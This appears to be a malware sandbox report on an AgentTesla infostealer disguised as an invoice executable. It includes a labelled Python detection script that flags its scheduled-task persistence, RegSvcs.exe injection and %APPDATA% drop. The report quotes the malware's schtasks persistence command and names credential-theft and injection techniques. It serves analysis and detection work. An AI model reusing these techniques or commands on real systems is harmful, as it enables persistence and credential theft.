            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: initial sample | Static PE information: Filename: INVOICE OUTSTANDING.exe
            Source: 14.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB0E6175Au002d5157u002d4EA6u002d8358u002dF3F5E689E6E9u007d/CD42D637u002dB157u002d4DF1u002d910Bu002d590510BF5A22.cs | Large array initialization: .cctor: array initializer size 11496
            Source: INVOICE OUTSTANDING.exe, AddCompanyForm.cs | Long String: Length: 20037
            Source: ahgeNfsrA.exe.0.dr, AddCompanyForm.cs | Long String: Length: 20037
            Source: 0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack, AddCompanyForm.cs | Long String: Length: 20037
            Source: INVOICE OUTSTANDING.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
            Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_014BE810
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_014BE820
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_014BBF54
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B9628
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B3E70
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B2D00
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B5478
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B63A8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078BD3F0
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B86AB
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B86B0
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B9627
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078BDD90
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B3DE2
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B4518
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B8480
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B8490
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078BC4D8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B44D8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B4450
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B546B
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B8B00
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B8B10
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078BCB20
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078BE360
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B62B5
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078BDAD8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B72E9
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B72F8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B625B
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B8938
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078B8948
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_078BD8B8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_08320040
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_083220B9
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_08320006
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_083221DF
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_0832026A
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Code function: 0_2_083202AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0169EFB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0169FBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01696080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_0169F300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C6C080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C61D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C66328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C63330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06C641D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D14228
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D14F88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D12D68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D116C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D98AD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D9B680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D90AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D9C6A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D92F68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D95D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D98AC7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D9C63C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D96BC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D96D08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_06D9B530
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamexbHwaYRFftTggpxGZzIM.exe4 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.340774998.0000000003E19000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.333821911.0000000002E11000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBunifu.UI.dll4 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.350083466.00000000077D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.295352536.00000000035D3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000000.253277318.0000000000B00000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamexbHwaYRFftTggpxGZzIM.exe4 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.344196351.000000000479C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe | Binary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: ahgeNfsrA.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
            Source: INVOICE OUTSTANDING.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ahgeNfsrA.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: INVOICE OUTSTANDING.exe | ReversingLabs: Detection: 37%
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File read: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe "C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
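            The process-creation rows above are the sample's execution chain: the dropper on the Desktop spawns schtasks.exe to register a task from an XML file in %TEMP%, then launches the .NET utility RegSvcs.exe, which the report's signatures identify as the target of the PE injection, and the dropped kECjS.exe later runs from %APPDATA%. The Python script below is an added example, not part of the Joe Sandbox report. It encodes those rows as data (parent image, child image, child command line), rebuilds the parent/child tree and applies three detection heuristics a SOC engineer would write for this chain. The heuristics, the path patterns and the list of injection-host binaries are this example's assumptions, not sandbox signatures.

```python
import re
from collections import defaultdict

# Process-creation rows taken from the report above: (parent image, child image, child command line).
# "unknown" is how the sandbox records a parent outside the monitored tree.
EVENTS = [
    ("unknown",
     r"C:\Users\user\Desktop\INVOICE OUTSTANDING.exe",
     r'"C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"'),
    (r"C:\Users\user\Desktop\INVOICE OUTSTANDING.exe",
     r"C:\Windows\System32\BackgroundTransferHost.exe",
     r'"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1'),
    (r"C:\Users\user\Desktop\INVOICE OUTSTANDING.exe",
     r"C:\Windows\SysWOW64\schtasks.exe",
     r'C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp'),
    (r"C:\Windows\SysWOW64\schtasks.exe",
     r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (r"C:\Users\user\Desktop\INVOICE OUTSTANDING.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "{path}"),
    ("unknown",
     r"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe",
     r'"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"'),
    (r"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe",
     r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Heuristics below are assumptions of this example, not Joe Sandbox rules.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.I)
TEMP_XML = re.compile(r"/xml\s+\"?[^\"]*\\Temp\\", re.I)
# .NET framework utilities commonly abused as hollowing/injection hosts by .NET loaders.
INJECTION_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def process_tree(events) -> dict:
    """Map each parent image to the list of child images it spawned."""
    tree = defaultdict(list)
    for parent, child, _ in events:
        tree[parent].append(child)
    return dict(tree)


def classify(parent: str, child: str, cmdline: str) -> list:
    """Return human-readable findings for one process-creation event."""
    findings = []
    name = basename(child)
    low = cmdline.lower()
    if name == "schtasks.exe" and "/create" in low and TEMP_XML.search(cmdline):
        findings.append("scheduled task created from XML in %TEMP%")
    if name in INJECTION_HOSTS and USER_WRITABLE.search(parent):
        findings.append("framework utility spawned by binary in user-writable path (injection host)")
    if "\\appdata\\" in child.lower():
        findings.append("process image in %APPDATA% (persistence location)")
    return findings


def triage(events) -> list:
    """Flatten findings across all events as 'child.exe: finding' strings."""
    out = []
    for parent, child, cmdline in events:
        for finding in classify(parent, child, cmdline):
            out.append(f"{basename(child)}: {finding}")
    return out


if __name__ == "__main__":
    for parent, children in process_tree(EVENTS).items():
        print(parent)
        for child in children:
            print("   ->", child)
    for line in triage(EVENTS):
        print("ALERT", line)
```

            Run against the rows above, the script flags the schtasks.exe call, the RegSvcs.exe launch and the kECjS.exe image while leaving conhost.exe and BackgroundTransferHost.exe unflagged. The same three rules translate directly into Sysmon Event ID 1 (process creation) queries, where ParentImage, Image and CommandLine carry the same fields.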
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File created: C:\Users\user\AppData\Roaming\ahgeNfsrA.exe
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File created: C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
            Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@11/8@1/1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: INVOICE OUTSTANDING.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | Mutant created: \Sessions\1\BaseNamedObjects\RcVQRTaRQnykjShrHjGChRlqXGx
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:504:120:WilError_01
            Source: INVOICE OUTSTANDING.exe | String found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
            Source: INVOICE OUTSTANDING.exe | String found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
            Source: 14.0.RegSvcs.exe.400000.0.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 14.0.RegSvcs.exe.400000.0.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: INVOICE OUTSTANDING.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: INVOICE OUTSTANDING.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.551379171.00000000067DD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000003.378901648.00000000067E7000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr

            Data Obfuscation

            Source: INVOICE OUTSTANDING.exe, AddCompanyForm.cs | .Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
